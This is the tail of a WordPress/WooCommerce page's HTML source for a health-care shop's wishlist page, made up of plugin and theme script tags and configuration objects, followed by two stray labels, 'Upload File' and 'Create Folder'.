{"params":{"lifetime":1.0e-5,"session":30,"base64":false,"ajaxurl":"https:\/\/charakhealthcare.in\/wp-admin\/admin-ajax.php","prefix":"wc_order_attribution_","allowTracking":true},"fields":{"source_type":"current.typ","referrer":"current_add.rf","utm_campaign":"current.cmp","utm_source":"current.src","utm_medium":"current.mdm","utm_content":"current.cnt","utm_id":"current.id","utm_term":"current.trm","utm_source_platform":"current.plt","utm_creative_format":"current.fmt","utm_marketing_tactic":"current.tct","session_entry":"current_add.ep","session_start_time":"current_add.fd","session_pages":"session.pgs","session_count":"udata.vst","user_agent":"udata.uag"}}; /* ]]> */ </script> <script type="text/javascript" src="https://charakhealthcare.in/wp-content/plugins/woocommerce/assets/js/frontend/order-attribution.min.js?ver=10.7.0" id="wc-order-attribution-js"></script> <script type="text/javascript" src="https://charakhealthcare.in/wp-content/plugins/elementor/assets/js/webpack.runtime.min.js?ver=4.1.0-dev1" id="elementor-webpack-runtime-js"></script> <script type="text/javascript" src="https://charakhealthcare.in/wp-content/plugins/elementor/assets/js/frontend-modules.min.js?ver=4.1.0-dev1" id="elementor-frontend-modules-js"></script> <script type="text/javascript" src="https://charakhealthcare.in/wp-includes/js/jquery/ui/core.min.js?ver=1.13.3" id="jquery-ui-core-js"></script> <script type="text/javascript" id="elementor-frontend-js-before"> /* <![CDATA[ */ var elementorFrontendConfig = {"environmentMode":{"edit":false,"wpPreview":false,"isScriptDebug":false},"i18n":{"shareOnFacebook":"Share on Facebook","shareOnTwitter":"Share on Twitter","pinIt":"Pin it","download":"Download","downloadImage":"Download image","fullscreen":"Fullscreen","zoom":"Zoom","share":"Share","playVideo":"Play Video","previous":"Previous","next":"Next","close":"Close","a11yCarouselPrevSlideMessage":"Previous slide","a11yCarouselNextSlideMessage":"Next slide","a11yCarouselFirstSlideMessage":"This is the first slide","a11yCarouselLastSlideMessage":"This is the last slide","a11yCarouselPaginationBulletMessage":"Go to slide"},"is_rtl":false,"breakpoints":{"xs":0,"sm":480,"md":769,"lg":1025,"xl":1440,"xxl":1600},"responsive":{"breakpoints":{"mobile":{"label":"Mobile Portrait","value":768,"default_value":767,"direction":"max","is_enabled":true},"mobile_extra":{"label":"Mobile Landscape","value":880,"default_value":880,"direction":"max","is_enabled":false},"tablet":{"label":"Tablet Portrait","value":1024,"default_value":1024,"direction":"max","is_enabled":true},"tablet_extra":{"label":"Tablet Landscape","value":1200,"default_value":1200,"direction":"max","is_enabled":false},"laptop":{"label":"Laptop","value":1366,"default_value":1366,"direction":"max","is_enabled":false},"widescreen":{"label":"Widescreen","value":2400,"default_value":2400,"direction":"min","is_enabled":false}},"hasCustomBreakpoints":true},"version":"4.1.0-dev1","is_static":false,"experimentalFeatures":{"e_font_icon_svg":true,"additional_custom_breakpoints":true,"container":true,"theme_builder_v2":true,"global_classes_should_enforce_capabilities":true,"e_variables":true,"e_opt_in_v4_page":true,"e_components":true,"e_interactions":true,"e_widget_creation":true,"import-export-customization":true},"urls":{"assets":"https:\/\/charakhealthcare.in\/wp-content\/plugins\/elementor\/assets\/","ajaxurl":"https:\/\/charakhealthcare.in\/wp-admin\/admin-ajax.php","uploadUrl":"https:\/\/charakhealthcare.in\/wp-content\/uploads"},"nonces":{"floatingButtonsClickTracking":"dbf5e53666","atomicFormsSendForm":"61c2339013"},"swiperClass":"swiper","settings":{"page":[],"editorPreferences":[]},"kit":{"viewport_mobile":"768.98","active_breakpoints":["viewport_mobile","viewport_tablet"],"global_image_lightbox":"yes","lightbox_enable_counter":"yes","lightbox_enable_fullscreen":"yes","lightbox_enable_zoom":"yes","lightbox_enable_share":"yes","lightbox_title_src":"title","lightbox_description_src":"description","woocommerce_notices_elements":[]},"post":{"id":22,"title":"Wishlist%20%E2%80%93%20Charak%20Health%20Care","excerpt":"","featuredImage":false}}; var elementorFrontendConfig = {"environmentMode":{"edit":false,"wpPreview":false,"isScriptDebug":false},"i18n":{"shareOnFacebook":"Share on Facebook","shareOnTwitter":"Share on Twitter","pinIt":"Pin it","download":"Download","downloadImage":"Download image","fullscreen":"Fullscreen","zoom":"Zoom","share":"Share","playVideo":"Play Video","previous":"Previous","next":"Next","close":"Close","a11yCarouselPrevSlideMessage":"Previous slide","a11yCarouselNextSlideMessage":"Next slide","a11yCarouselFirstSlideMessage":"This is the first slide","a11yCarouselLastSlideMessage":"This is the last slide","a11yCarouselPaginationBulletMessage":"Go to slide"},"is_rtl":false,"breakpoints":{"xs":0,"sm":480,"md":769,"lg":1025,"xl":1440,"xxl":1600},"responsive":{"breakpoints":{"mobile":{"label":"Mobile Portrait","value":768,"default_value":767,"direction":"max","is_enabled":true},"mobile_extra":{"label":"Mobile Landscape","value":880,"default_value":880,"direction":"max","is_enabled":false},"tablet":{"label":"Tablet Portrait","value":1024,"default_value":1024,"direction":"max","is_enabled":true},"tablet_extra":{"label":"Tablet Landscape","value":1200,"default_value":1200,"direction":"max","is_enabled":false},"laptop":{"label":"Laptop","value":1366,"default_value":1366,"direction":"max","is_enabled":false},"widescreen":{"label":"Widescreen","value":2400,"default_value":2400,"direction":"min","is_enabled":false}},"hasCustomBreakpoints":true},"version":"4.1.0-dev1","is_static":false,"experimentalFeatures":{"e_font_icon_svg":true,"additional_custom_breakpoints":true,"container":true,"theme_builder_v2":true,"global_classes_should_enforce_capabilities":true,"e_variables":true,"e_opt_in_v4_page":true,"e_components":true,"e_interactions":true,"e_widget_creation":true,"import-export-customization":true},"urls":{"assets":"https:\/\/charakhealthcare.in\/wp-content\/plugins\/elementor\/assets\/","ajaxurl":"https:\/\/charakhealthcare.in\/wp-admin\/admin-ajax.php","uploadUrl":"https:\/\/charakhealthcare.in\/wp-content\/uploads"},"nonces":{"floatingButtonsClickTracking":"dbf5e53666","atomicFormsSendForm":"61c2339013"},"swiperClass":"swiper","settings":{"page":[],"editorPreferences":[]},"kit":{"viewport_mobile":"768.98","active_breakpoints":["viewport_mobile","viewport_tablet"],"global_image_lightbox":"yes","lightbox_enable_counter":"yes","lightbox_enable_fullscreen":"yes","lightbox_enable_zoom":"yes","lightbox_enable_share":"yes","lightbox_title_src":"title","lightbox_description_src":"description","woocommerce_notices_elements":[]},"post":{"id":22,"title":"Wishlist%20%E2%80%93%20Charak%20Health%20Care","excerpt":"","featuredImage":false}}; /* ]]> */ </script> <script type="text/javascript" src="https://charakhealthcare.in/wp-content/plugins/elementor/assets/js/frontend.min.js?ver=4.1.0-dev1" id="elementor-frontend-js"></script> <script type="text/javascript" src="https://charakhealthcare.in/wp-content/plugins/elementor-pro/assets/js/webpack-pro.runtime.min.js?ver=3.28.0" id="elementor-pro-webpack-runtime-js"></script> <script type="text/javascript" id="elementor-pro-frontend-js-before"> /* <![CDATA[ */ var ElementorProFrontendConfig = {"ajaxurl":"https:\/\/charakhealthcare.in\/wp-admin\/admin-ajax.php","nonce":"93c3802572","urls":{"assets":"https:\/\/charakhealthcare.in\/wp-content\/plugins\/elementor-pro\/assets\/","rest":"https:\/\/charakhealthcare.in\/wp-json\/"},"settings":{"lazy_load_background_images":true},"popup":{"hasPopUps":false},"shareButtonsNetworks":{"facebook":{"title":"Facebook","has_counter":true},"twitter":{"title":"Twitter"},"linkedin":{"title":"LinkedIn","has_counter":true},"pinterest":{"title":"Pinterest","has_counter":true},"reddit":{"title":"Reddit","has_counter":true},"vk":{"title":"VK","has_counter":true},"odnoklassniki":{"title":"OK","has_counter":true},"tumblr":{"title":"Tumblr"},"digg":{"title":"Digg"},"skype":{"title":"Skype"},"stumbleupon":{"title":"StumbleUpon","has_counter":true},"mix":{"title":"Mix"},"telegram":{"title":"Telegram"},"pocket":{"title":"Pocket","has_counter":true},"xing":{"title":"XING","has_counter":true},"whatsapp":{"title":"WhatsApp"},"email":{"title":"Email"},"print":{"title":"Print"},"x-twitter":{"title":"X"},"threads":{"title":"Threads"}},"woocommerce":{"menu_cart":{"cart_page_url":"https:\/\/charakhealthcare.in\/cart\/","checkout_page_url":"https:\/\/charakhealthcare.in\/checkout\/","fragments_nonce":"fa634194e3"}},"facebook_sdk":{"lang":"en_US","app_id":""},"lottie":{"defaultAnimationUrl":"https:\/\/charakhealthcare.in\/wp-content\/plugins\/elementor-pro\/modules\/lottie\/assets\/animations\/default.json"}}; var ElementorProFrontendConfig = {"ajaxurl":"https:\/\/charakhealthcare.in\/wp-admin\/admin-ajax.php","nonce":"93c3802572","urls":{"assets":"https:\/\/charakhealthcare.in\/wp-content\/plugins\/elementor-pro\/assets\/","rest":"https:\/\/charakhealthcare.in\/wp-json\/"},"settings":{"lazy_load_background_images":true},"popup":{"hasPopUps":false},"shareButtonsNetworks":{"facebook":{"title":"Facebook","has_counter":true},"twitter":{"title":"Twitter"},"linkedin":{"title":"LinkedIn","has_counter":true},"pinterest":{"title":"Pinterest","has_counter":true},"reddit":{"title":"Reddit","has_counter":true},"vk":{"title":"VK","has_counter":true},"odnoklassniki":{"title":"OK","has_counter":true},"tumblr":{"title":"Tumblr"},"digg":{"title":"Digg"},"skype":{"title":"Skype"},"stumbleupon":{"title":"StumbleUpon","has_counter":true},"mix":{"title":"Mix"},"telegram":{"title":"Telegram"},"pocket":{"title":"Pocket","has_counter":true},"xing":{"title":"XING","has_counter":true},"whatsapp":{"title":"WhatsApp"},"email":{"title":"Email"},"print":{"title":"Print"},"x-twitter":{"title":"X"},"threads":{"title":"Threads"}},"woocommerce":{"menu_cart":{"cart_page_url":"https:\/\/charakhealthcare.in\/cart\/","checkout_page_url":"https:\/\/charakhealthcare.in\/checkout\/","fragments_nonce":"fa634194e3"}},"facebook_sdk":{"lang":"en_US","app_id":""},"lottie":{"defaultAnimationUrl":"https:\/\/charakhealthcare.in\/wp-content\/plugins\/elementor-pro\/modules\/lottie\/assets\/animations\/default.json"}}; /* ]]> */ </script> <script type="text/javascript" src="https://charakhealthcare.in/wp-content/plugins/elementor-pro/assets/js/frontend.min.js?ver=3.28.0" id="elementor-pro-frontend-js"></script> <script type="text/javascript" src="https://charakhealthcare.in/wp-content/plugins/elementor-pro/assets/js/elements-handlers.min.js?ver=3.28.0" id="pro-elements-handlers-js"></script> <script type="text/javascript" id="elementskit-elementor-js-extra"> /* <![CDATA[ */ var ekit_config = {"ajaxurl":"https:\/\/charakhealthcare.in\/wp-admin\/admin-ajax.php","nonce":"50834084b0"}; var ekit_config = {"ajaxurl":"https:\/\/charakhealthcare.in\/wp-admin\/admin-ajax.php","nonce":"50834084b0"}; /* ]]> */ </script> <script type="text/javascript" src="https://charakhealthcare.in/wp-content/plugins/elementskit-lite/widgets/init/assets/js/elementor.js?ver=3.9.3" id="elementskit-elementor-js"></script> <script type="text/javascript" id="woodmart-theme-js-extra"> /* <![CDATA[ */ var woodmart_settings = {"menu_storage_key":"woodmart_09779891e8a83978e5a1477689c39983","ajax_dropdowns_save":"1","photoswipe_close_on_scroll":"1","woocommerce_ajax_add_to_cart":"yes","variation_gallery_storage_method":"old","elementor_no_gap":"enabled","adding_to_cart":"Processing","added_to_cart":"Product was successfully added to your cart.","continue_shopping":"Continue shopping","view_cart":"View Cart","go_to_checkout":"Checkout","loading":"Loading...","countdown_days":"days","countdown_hours":"hr","countdown_mins":"min","countdown_sec":"sc","cart_url":"https:\/\/charakhealthcare.in\/cart\/","ajaxurl":"https:\/\/charakhealthcare.in\/wp-admin\/admin-ajax.php","add_to_cart_action":"widget","added_popup":"no","categories_toggle":"yes","enable_popup":"no","popup_delay":"2000","popup_event":"time","popup_scroll":"1000","popup_pages":"0","promo_popup_hide_mobile":"yes","product_images_captions":"no","ajax_add_to_cart":"1","all_results":"View all results","zoom_enable":"yes","ajax_scroll":"yes","ajax_scroll_class":".wd-page-content","ajax_scroll_offset":"100","infinit_scroll_offset":"300","product_slider_auto_height":"no","price_filter_action":"click","product_slider_autoplay":"","close":"Close (Esc)","share_fb":"Share on Facebook","pin_it":"Pin it","tweet":"Share on X","download_image":"Download image","off_canvas_column_close_btn_text":"Close","cookies_version":"1","header_banner_version":"1","promo_version":"1","header_banner_close_btn":"no","header_banner_enabled":"no","whb_header_clone":"\n <div class=\"whb-sticky-header whb-clone whb-main-header <%wrapperClasses%>\">\n <div class=\"<%cloneClass%>\">\n <div class=\"container\">\n <div class=\"whb-flex-row whb-general-header-inner\">\n <div class=\"whb-column whb-col-left whb-visible-lg\">\n <%.site-logo%>\n <\/div>\n <div class=\"whb-column whb-col-center whb-visible-lg\">\n <%.wd-header-main-nav%>\n <\/div>\n <div class=\"whb-column whb-col-right whb-visible-lg\">\n <%.wd-header-my-account%>\n <%.wd-header-search:not(.wd-header-search-mobile)%>\n <%.wd-header-wishlist%>\n <%.wd-header-compare%>\n <%.wd-header-cart%>\n <%.wd-header-fs-nav%>\n <\/div>\n <%.whb-mobile-left%>\n <%.whb-mobile-center%>\n <%.whb-mobile-right%>\n <\/div>\n <\/div>\n <\/div>\n <\/div>\n","pjax_timeout":"5000","split_nav_fix":"","shop_filters_close":"no","woo_installed":"1","base_hover_mobile_click":"no","centered_gallery_start":"1","quickview_in_popup_fix":"","one_page_menu_offset":"150","hover_width_small":"1","is_multisite":"","current_blog_id":"1","swatches_scroll_top_desktop":"no","swatches_scroll_top_mobile":"no","lazy_loading_offset":"0","add_to_cart_action_timeout":"no","add_to_cart_action_timeout_number":"3","single_product_variations_price":"no","google_map_style_text":"Custom style","quick_shop":"yes","sticky_product_details_offset":"150","sticky_product_details_different":"100","preloader_delay":"300","comment_images_upload_size_text":"Some files are too large. Allowed file size is 1 MB.","comment_images_count_text":"You can upload up to 3 images to your review.","single_product_comment_images_required":"no","comment_required_images_error_text":"Image is required.","comment_images_upload_mimes_text":"You are allowed to upload images only in png, jpeg formats.","comment_images_added_count_text":"Added %s image(s)","comment_images_upload_size":"1048576","comment_images_count":"3","search_input_padding":"no","comment_images_upload_mimes":{"jpg|jpeg|jpe":"image\/jpeg","png":"image\/png"},"home_url":"https:\/\/charakhealthcare.in\/","shop_url":"https:\/\/charakhealthcare.in\/shop\/","age_verify":"no","banner_version_cookie_expires":"60","promo_version_cookie_expires":"7","age_verify_expires":"30","countdown_timezone":"GMT","cart_redirect_after_add":"no","swatches_labels_name":"no","product_categories_placeholder":"Select a category","product_categories_no_results":"No matches found","cart_hash_key":"wc_cart_hash_bf53890a23063d9de322dc7303394660","fragment_name":"wc_fragments_bf53890a23063d9de322dc7303394660","photoswipe_template":"<div class=\"pswp\" aria-hidden=\"true\" role=\"dialog\" tabindex=\"-1\"><div class=\"pswp__bg\"><\/div><div class=\"pswp__scroll-wrap\"><div class=\"pswp__container\"><div class=\"pswp__item\"><\/div><div class=\"pswp__item\"><\/div><div class=\"pswp__item\"><\/div><\/div><div class=\"pswp__ui pswp__ui--hidden\"><div class=\"pswp__top-bar\"><div class=\"pswp__counter\"><\/div><button class=\"pswp__button pswp__button--close\" title=\"Close (Esc)\"><\/button> <button class=\"pswp__button pswp__button--share\" title=\"Share\"><\/button> <button class=\"pswp__button pswp__button--fs\" title=\"Toggle fullscreen\"><\/button> <button class=\"pswp__button pswp__button--zoom\" title=\"Zoom in\/out\"><\/button><div class=\"pswp__preloader\"><div class=\"pswp__preloader__icn\"><div class=\"pswp__preloader__cut\"><div class=\"pswp__preloader__donut\"><\/div><\/div><\/div><\/div><\/div><div class=\"pswp__share-modal pswp__share-modal--hidden pswp__single-tap\"><div class=\"pswp__share-tooltip\"><\/div><\/div><button class=\"pswp__button pswp__button--arrow--left\" title=\"Previous (arrow left)\"><\/button> <button class=\"pswp__button pswp__button--arrow--right\" title=\"Next (arrow right)>\"><\/button><div class=\"pswp__caption\"><div class=\"pswp__caption__center\"><\/div><\/div><\/div><\/div><\/div>","load_more_button_page_url":"yes","load_more_button_page_url_opt":"yes","menu_item_hover_to_click_on_responsive":"no","clear_menu_offsets_on_resize":"yes","three_sixty_framerate":"60","three_sixty_prev_next_frames":"5","ajax_search_delay":"300","animated_counter_speed":"3000","site_width":"1422","cookie_secure_param":"1","cookie_path":"\/","theme_dir":"https:\/\/charakhealthcare.in\/wp-content\/themes\/woodmart","slider_distortion_effect":"sliderWithNoise","current_page_builder":"elementor","collapse_footer_widgets":"yes","carousel_breakpoints":{"1025":"lg","768.98":"md","0":"sm"},"ajax_fullscreen_content":"yes","grid_gallery_control":"hover","grid_gallery_enable_arrows":"none","ajax_shop":"1","add_to_cart_text":"Add to cart","mobile_navigation_drilldown_back_to":"Back to %s","mobile_navigation_drilldown_back_to_main_menu":"Back to menu","mobile_navigation_drilldown_back_to_categories":"Back to categories","tooltip_left_selector":".wd-buttons[class*=\"wd-pos-r\"] .wd-action-btn, .wd-portfolio-btns .portfolio-enlarge","tooltip_top_selector":".wd-tooltip, .wd-buttons:not([class*=\"wd-pos-r\"]) > .wd-action-btn, body:not(.catalog-mode-on):not(.login-see-prices) .wd-hover-base .wd-bottom-actions .wd-action-btn.wd-style-icon, .wd-hover-base .wd-compare-btn, body:not(.logged-in) .wd-review-likes a","ajax_links":".wd-nav-product-cat a, .wd-page-wrapper .widget_product_categories a, .widget_layered_nav_filters a, .woocommerce-widget-layered-nav a, .filters-area:not(.custom-content) a, body.post-type-archive-product:not(.woocommerce-account) .woocommerce-pagination a, body.tax-product_cat:not(.woocommerce-account) .woocommerce-pagination a, .wd-shop-tools a:not([rel=\"v:url\"]), .woodmart-woocommerce-layered-nav a, .woodmart-price-filter a, .wd-clear-filters a, .woodmart-woocommerce-sort-by a, .woocommerce-widget-layered-nav-list a, .wd-widget-stock-status a, .widget_nav_mega_menu a, .wd-products-shop-view a, .wd-products-per-page a, .category-grid-item a, .wd-cat a, body[class*=\"tax-pa_\"] .woocommerce-pagination a","wishlist_expanded":"no","wishlist_show_popup":"enable","wishlist_page_nonce":"2515c77af2","wishlist_fragments_nonce":"c5ca2a05bf","wishlist_remove_notice":"Do you really want to remove these products?","wishlist_hash_name":"woodmart_wishlist_hash_c99af67a9ec720dff7d59b819d5dcb3b","wishlist_fragment_name":"woodmart_wishlist_fragments_c99af67a9ec720dff7d59b819d5dcb3b","wishlist_save_button_state":"no","counter_visitor_live_duration":"10000","counter_visitor_ajax_update":"yes","counter_visitor_live_mode":"no","is_criteria_enabled":"","summary_criteria_ids":"","review_likes_tooltip":"Please log in to rate reviews.","vimeo_library_url":"https:\/\/charakhealthcare.in\/wp-content\/themes\/woodmart\/js\/libs\/vimeo-player.min.js","reviews_criteria_rating_required":"no","is_rating_summary_filter_enabled":"1"}; var woodmart_page_css = {"wd-helpers-wpb-elem-css":"https:\/\/charakhealthcare.in\/wp-content\/themes\/woodmart\/css\/parts\/helpers-wpb-elem.min.css","wd-widget-recent-post-comments-css":"https:\/\/charakhealthcare.in\/wp-content\/themes\/woodmart\/css\/parts\/widget-recent-post-comments.min.css","wd-widget-wd-recent-posts-css":"https:\/\/charakhealthcare.in\/wp-content\/themes\/woodmart\/css\/parts\/widget-wd-recent-posts.min.css","wd-widget-nav-css":"https:\/\/charakhealthcare.in\/wp-content\/themes\/woodmart\/css\/parts\/widget-nav.min.css","wd-widget-wd-layered-nav-css":"https:\/\/charakhealthcare.in\/wp-content\/themes\/woodmart\/css\/parts\/woo-widget-wd-layered-nav.min.css","wd-woo-mod-swatches-base-css":"https:\/\/charakhealthcare.in\/wp-content\/themes\/woodmart\/css\/parts\/woo-mod-swatches-base.min.css","wd-woo-mod-swatches-filter-css":"https:\/\/charakhealthcare.in\/wp-content\/themes\/woodmart\/css\/parts\/woo-mod-swatches-filter.min.css","wd-widget-layered-nav-stock-status-css":"https:\/\/charakhealthcare.in\/wp-content\/themes\/woodmart\/css\/parts\/woo-widget-layered-nav-stock-status.min.css","wd-widget-slider-price-filter-css":"https:\/\/charakhealthcare.in\/wp-content\/themes\/woodmart\/css\/parts\/woo-widget-slider-price-filter.min.css","wd-wpcf7-css":"https:\/\/charakhealthcare.in\/wp-content\/themes\/woodmart\/css\/parts\/int-wpcf7.min.css","wd-elementor-base-css":"https:\/\/charakhealthcare.in\/wp-content\/themes\/woodmart\/css\/parts\/int-elem-base.min.css","wd-elementor-pro-base-css":"https:\/\/charakhealthcare.in\/wp-content\/themes\/woodmart\/css\/parts\/int-elementor-pro.min.css","wd-woocommerce-base-css":"https:\/\/charakhealthcare.in\/wp-content\/themes\/woodmart\/css\/parts\/woocommerce-base.min.css","wd-mod-star-rating-css":"https:\/\/charakhealthcare.in\/wp-content\/themes\/woodmart\/css\/parts\/mod-star-rating.min.css","wd-woo-el-track-order-css":"https:\/\/charakhealthcare.in\/wp-content\/themes\/woodmart\/css\/parts\/woo-el-track-order.min.css","wd-woocommerce-block-notices-css":"https:\/\/charakhealthcare.in\/wp-content\/themes\/woodmart\/css\/parts\/woo-mod-block-notices.min.css","wd-page-wishlist-css":"https:\/\/charakhealthcare.in\/wp-content\/themes\/woodmart\/css\/parts\/woo-page-wishlist.min.css","wd-page-my-account-css":"https:\/\/charakhealthcare.in\/wp-content\/themes\/woodmart\/css\/parts\/woo-page-my-account.min.css","wd-woo-opt-hide-larger-price-css":"https:\/\/charakhealthcare.in\/wp-content\/themes\/woodmart\/css\/parts\/woo-opt-hide-larger-price.min.css","wd-wp-blocks-css":"https:\/\/charakhealthcare.in\/wp-content\/themes\/woodmart\/css\/parts\/wp-blocks.min.css","wd-header-base-css":"https:\/\/charakhealthcare.in\/wp-content\/themes\/woodmart\/css\/parts\/header-base.min.css","wd-mod-tools-css":"https:\/\/charakhealthcare.in\/wp-content\/themes\/woodmart\/css\/parts\/mod-tools.min.css","wd-header-elements-base-css":"https:\/\/charakhealthcare.in\/wp-content\/themes\/woodmart\/css\/parts\/header-el-base.min.css","wd-social-icons-css":"https:\/\/charakhealthcare.in\/wp-content\/themes\/woodmart\/css\/parts\/el-social-icons.min.css","wd-social-icons-styles-css":"https:\/\/charakhealthcare.in\/wp-content\/themes\/woodmart\/css\/parts\/el-social-styles.min.css","wd-woo-mod-login-form-css":"https:\/\/charakhealthcare.in\/wp-content\/themes\/woodmart\/css\/parts\/woo-mod-login-form.min.css","wd-header-my-account-css":"https:\/\/charakhealthcare.in\/wp-content\/themes\/woodmart\/css\/parts\/header-el-my-account.min.css","wd-header-cart-side-css":"https:\/\/charakhealthcare.in\/wp-content\/themes\/woodmart\/css\/parts\/header-el-cart-side.min.css","wd-header-cart-css":"https:\/\/charakhealthcare.in\/wp-content\/themes\/woodmart\/css\/parts\/header-el-cart.min.css","wd-widget-shopping-cart-css":"https:\/\/charakhealthcare.in\/wp-content\/themes\/woodmart\/css\/parts\/woo-widget-shopping-cart.min.css","wd-widget-product-list-css":"https:\/\/charakhealthcare.in\/wp-content\/themes\/woodmart\/css\/parts\/woo-widget-product-list.min.css","wd-header-mobile-nav-dropdown-css":"https:\/\/charakhealthcare.in\/wp-content\/themes\/woodmart\/css\/parts\/header-el-mobile-nav-dropdown.min.css","wd-page-title-css":"https:\/\/charakhealthcare.in\/wp-content\/themes\/woodmart\/css\/parts\/page-title.min.css","wd-woo-page-empty-page-css":"https:\/\/charakhealthcare.in\/wp-content\/themes\/woodmart\/css\/parts\/woo-page-empty-page.min.css","wd-widget-collapse-css":"https:\/\/charakhealthcare.in\/wp-content\/themes\/woodmart\/css\/parts\/opt-widget-collapse.min.css","wd-footer-base-css":"https:\/\/charakhealthcare.in\/wp-content\/themes\/woodmart\/css\/parts\/footer-base.min.css","wd-scroll-top-css":"https:\/\/charakhealthcare.in\/wp-content\/themes\/woodmart\/css\/parts\/opt-scrolltotop.min.css","wd-header-my-account-sidebar-css":"https:\/\/charakhealthcare.in\/wp-content\/themes\/woodmart\/css\/parts\/header-el-my-account-sidebar.min.css","wd-bottom-toolbar-css":"https:\/\/charakhealthcare.in\/wp-content\/themes\/woodmart\/css\/parts\/opt-bottom-toolbar.min.css"}; var woodmart_variation_gallery_data = []; /* ]]> */ </script> <script type="text/javascript" src="https://charakhealthcare.in/wp-content/themes/woodmart/js/scripts/global/helpers.min.js?ver=8.0.6" id="woodmart-theme-js"></script> <script type="text/javascript" src="https://charakhealthcare.in/wp-content/themes/woodmart/js/scripts/wc/woocommerceNotices.min.js?ver=8.0.6" id="wd-woocommerce-notices-js"></script> <script type="text/javascript" src="https://charakhealthcare.in/wp-content/themes/woodmart/js/scripts/header/headerBuilder.min.js?ver=8.0.6" id="wd-header-builder-js"></script> <script type="text/javascript" src="https://charakhealthcare.in/wp-content/themes/woodmart/js/scripts/wc/loginSidebar.min.js?ver=8.0.6" id="wd-login-sidebar-js"></script> <script type="text/javascript" src="https://charakhealthcare.in/wp-content/themes/woodmart/js/scripts/wc/wishlist.min.js?ver=8.0.6" id="wd-wishlist-js"></script> <script type="text/javascript" src="https://charakhealthcare.in/wp-content/themes/woodmart/js/scripts/wc/onRemoveFromCart.min.js?ver=8.0.6" id="wd-on-remove-from-cart-js"></script> <script type="text/javascript" src="https://charakhealthcare.in/wp-content/themes/woodmart/js/scripts/menu/menuOffsets.min.js?ver=8.0.6" id="wd-menu-offsets-js"></script> <script type="text/javascript" src="https://charakhealthcare.in/wp-content/themes/woodmart/js/scripts/menu/menuSetUp.min.js?ver=8.0.6" id="wd-menu-setup-js"></script> <script type="text/javascript" src="https://charakhealthcare.in/wp-content/themes/woodmart/js/scripts/global/widgetCollapse.min.js?ver=8.0.6" id="wd-widget-collapse-js"></script> <script type="text/javascript" src="https://charakhealthcare.in/wp-content/themes/woodmart/js/scripts/global/scrollTop.min.js?ver=8.0.6" id="wd-scroll-top-js"></script> <script type="text/javascript" src="https://charakhealthcare.in/wp-content/themes/woodmart/js/scripts/menu/mobileNavigation.min.js?ver=8.0.6" id="wd-mobile-navigation-js"></script> <script type="text/javascript" src="https://charakhealthcare.in/wp-content/themes/woodmart/js/scripts/wc/cartWidget.min.js?ver=8.0.6" id="wd-cart-widget-js"></script> <script type="text/javascript" id="wc-cart-fragments-js-extra"> /* <![CDATA[ */ var wc_cart_fragments_params = {"ajax_url":"\/wp-admin\/admin-ajax.php","wc_ajax_url":"\/?wc-ajax=%%endpoint%%","cart_hash_key":"wc_cart_hash_bf53890a23063d9de322dc7303394660","fragment_name":"wc_fragments_bf53890a23063d9de322dc7303394660","request_timeout":"5000"}; /* ]]> */ </script> <script type="text/javascript" src="https://charakhealthcare.in/wp-content/plugins/woocommerce/assets/js/frontend/cart-fragments.min.js?ver=10.7.0" id="wc-cart-fragments-js" defer="defer" data-wp-strategy="defer"></script> <script type="text/javascript" id="gla-gtag-events-js-extra"> /* <![CDATA[ */ var glaGtagData = {"currency_minor_unit":"2","products":[]}; /* ]]> */ </script> <script type="text/javascript" src="https://charakhealthcare.in/wp-content/plugins/google-listings-and-ads/js/build/gtag-events.js?ver=6972d3af2e3be67de9f1" id="gla-gtag-events-js"></script> <div data-pafe-ajax-url="https://charakhealthcare.in/wp-admin/admin-ajax.php"></div></body> </html>
Upload File
Create Folder